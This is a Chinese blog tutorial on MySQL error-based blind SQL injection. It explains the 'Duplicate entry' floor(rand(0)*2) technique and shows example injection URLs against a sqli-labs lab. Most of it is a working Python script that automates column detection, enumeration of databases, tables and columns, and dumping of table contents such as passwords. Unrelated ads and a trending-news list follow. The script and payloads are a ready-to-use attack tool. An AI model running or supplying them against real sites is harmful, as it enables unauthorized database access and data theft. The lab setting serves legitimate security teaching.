sql盲注之报错注入(附自动化脚本)
作者:__LSA__

0x00 概述

渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲注系列的第一篇,介绍盲注中的报错注入。

0x01 报错注入原理

其实报错注入有很多种,本文主要介绍几种常见的报错方法,有新姿势后续再更新。

1. Duplicate entry报错:

一句话概括就是多次查询插入重复键值导致count报错从而在报错信息中带入了敏感信息。 关键是查询时会建立临时表存储数据,不存在键值就插入,group by使插入前rand()会再执行一次,存在就直接值加1,下面以rand(0)简述原理:

首先看看接下来会用到的几个函数:
Count() 计算总数
Concat() 连接字符串
Floor() 向下取整数
Rand() 产生0~1的随机数
rand(0)序列是011011


192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+

192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+

192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+

192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat((select password from users limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+




# coding:utf-8
# Author: LSA
# Description: error-based blind SQL injection automation script
# Date: 20171222
import optparse
import re
import sys

import requests
from termcolor import colored

# The injected payloads make MySQL raise a "Duplicate entry '<value>&<0|1>'
# for key ..." error, so the leaked value sits between a quote and an '&'
# (0x26) in the response body; these patterns pull it back out.
_NUM_RE = re.compile(r"'(\d*?)&")  # numeric results (row / schema counts)
_VAL_RE = re.compile(r"'(.*?)&")   # arbitrary string results

# Cells collected by dumpData(), kept column-major for the final table print.
fdata = []


def _leak(inj_url, pattern=_VAL_RE):
    """Send one injected request and return the value leaked in the error page.

    Raises AttributeError if the error message is absent (injection failed),
    matching the original script's behaviour of crashing on a bad target.
    """
    html = requests.get(inj_url).text
    return pattern.search(html).group(1)


def judge_columns_num(url):
    """Detect the SELECT column count via ORDER BY probing.

    Walks ORDER BY 1..99 and watches the response content-length: the first
    index whose length differs from ORDER BY 1 is one past the real count.
    Returns the detected count, or None if no change was observed.
    """
    base_length = None
    for i in range(1, 100):
        probe = url + "'" + "order by " + str(i) + "--+"
        length = requests.get(probe).headers['content-length']
        if i == 1:
            base_length = length  # baseline: page length for a valid ORDER BY
            continue
        if length != base_length:
            # ORDER BY i errored out, so the query has i-1 columns.
            print(colored('column nums is ' + str(i - 1), "green", attrs=["bold"]))
            return i - 1
    return None


def getDatabases(url):
    """Enumerate and print every schema name on the server."""
    dbs_url = url + "' union select 1,count(*),concat((select count(distinct+table_schema) from information_schema.tables),0x26,floor(rand(0)*2))x from information_schema.tables group by x;--+"
    dbs_num = int(_leak(dbs_url, _NUM_RE))
    print("databases num:" + colored(dbs_num, "green", attrs=["bold"]))
    print("dbs name: ")
    dbs = []
    for db_index in range(dbs_num):
        db_name_url = url + "' union select 1,count(*),concat((select distinct table_schema from information_schema.tables limit %d,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % db_index
        db_name = _leak(db_name_url)
        dbs.append(db_name)
        print(colored("\t%s" % db_name, "green", attrs=["bold"]))


def getTables(url, db_name):
    """Enumerate and print the table names of schema *db_name*."""
    tables_num_url = url + "' union select 1,count(*),concat((select count(table_name) from information_schema.tables where table_schema='%s'),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % db_name
    tables_num = int(_leak(tables_num_url, _NUM_RE))
    print("databases %s,tables num: %d" % (db_name, tables_num))
    print("tables name: ")
    for table_index in range(tables_num):
        table_name_url = url + "' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='%s' limit %d,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % (db_name, table_index)
        print(colored("\t%s" % _leak(table_name_url), "green", attrs=["bold"]))


def getColumns(url, db_name, table_name):
    """Enumerate and print the column names of db_name.table_name."""
    columns_num_url = url + "' union select 1,count(*),concat((select count(column_name) from information_schema.columns where table_schema='%s' and table_name='%s' ),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % (db_name, table_name)
    columns_num = int(_leak(columns_num_url, _NUM_RE))
    print("table: %s,dataColumns num: %d" % (table_name, columns_num))
    print("DataColumns name:")
    for column_index in range(columns_num):
        column_name_url = url + "' union select 1,count(*),concat((select column_name from information_schema.columns where table_schema='%s' and table_name='%s' limit %d,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % (db_name, table_name, column_index)
        print(colored("\t\t%s" % _leak(column_name_url), "green", attrs=["bold"]))


def dumpData(url, db_name, table_name, inputColumns_name):
    """Dump the comma-separated columns *inputColumns_name* of db_name.table_name.

    Each cell is fetched with its own request (one column at a time, row by
    row), appended to the module-level fdata list, and finally re-printed as
    a header row plus one line per record.
    """
    count_url = url + "' union select 1,count(*),concat((select count(*) from %s.%s),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % (db_name, table_name)
    row_count = int(_leak(count_url, _NUM_RE))
    input_columns = inputColumns_name.split(',')
    print(colored("Total datas: " + str(row_count), "green", attrs=["bold"]))
    print(str(inputColumns_name) + ":")
    # Fetch column by column, so fdata ends up column-major.
    for column in input_columns:
        for row_index in range(row_count):
            cell_url = url + "' union select 1,count(*),concat((select %s from %s.%s limit %d,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % (column, db_name, table_name, row_index)
            cell = _leak(cell_url)
            fdata.append(cell)
            print(colored("\t%s" % cell, "green", attrs=["bold"]))
    # Pretty-print the collected cells as a table.
    print("\t".join(str(c) for c in input_columns))
    print("+++++++++++++++++++++++++++++++++++++++++++++++++")
    # fdata is column-major: cells of one record are len(fdata)//columns apart.
    per_column = len(fdata) // len(input_columns)
    for record in range(per_column):
        cells = [fdata[d] for d in range(record, len(fdata), per_column)]
        print("\t".join(colored(c, "green", attrs=["bold"]) for c in cells))
    print("+++++++++++++++++++++++++++++++++++++++++++++++++")


def main():
    """Parse command-line options and dispatch to the enumeration helpers."""
    parser = optparse.OptionParser('python %prog ' +
                                   '-h <manual>')
    parser.add_option('-u', dest='tgtUrl', type='string',
                      help='input target url')
    parser.add_option('--dbs', dest='dbs', action='store_true', help='get dbs')
    parser.add_option('--tables', dest='tables', action='store_true',
                      help='get tables')
    parser.add_option('--columns', dest='columns', action='store_true',
                      help='get columns')
    parser.add_option('-D', dest='db', type='string', help='choose a db')
    parser.add_option('-T', dest='table', type='string',
                      help='choose a table')
    parser.add_option('-C', dest='column', type='string',
                      help='choose column(s)')
    parser.add_option('--dump', dest='data', action='store_true',
                      help='get datas')
    options, _args = parser.parse_args()
    url = options.tgtUrl
    if url is None:
        # No target supplied: show usage instead of exiting silently.
        parser.print_help()
        sys.exit(0)
    # Bare "-u URL" with no action flags only detects the column count.
    if not any((options.dbs, options.db, options.tables, options.table,
                options.columns, options.column, options.data)):
        judge_columns_num(url)
    if options.dbs:
        getDatabases(url)
    if options.db and options.tables:
        getTables(url, options.db)
    if options.db and options.table and options.columns:
        getColumns(url, options.db, options.table)
    if options.db and options.table and options.column and options.data:
        dumpData(url, options.db, options.table, options.column)


if __name__ == '__main__':
    main()

# If you don't want to fix up the escape characters by hand, copy the code
# from my blog:
# www.lsablog.com/network_security/penetration/error-based-blind-sqli/
# 效果图 (result screenshots):


>>>>>黑客入门必备技能 带你入坑,和逗比表哥们一起聊聊黑客的事儿,他们说高精尖的技术比农药都好玩!
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 推动干部能上能下 7914355
- 2 亚冬会遭美国等地网络攻击超27万次 7931653
- 3 外交部回应美方对华加征34%关税 7814301
- 4 清明假期“短途游”成热门选择 7754547
- 5 3名菲律宾间谍落网 相貌曝光 7629300
- 6 “内鬼”柯雪琴被查 涉严重违纪违法 7528771
- 7 特朗普向无人岛加税 岛上挤满了企鹅 7494856
- 8 CBA名帅刘维伟被妻子实锤出轨 7333718
- 9 中方将反制美国所谓对等关税 7246825
- 10 美疑禁止其驻华人员与中国公民恋爱 7108513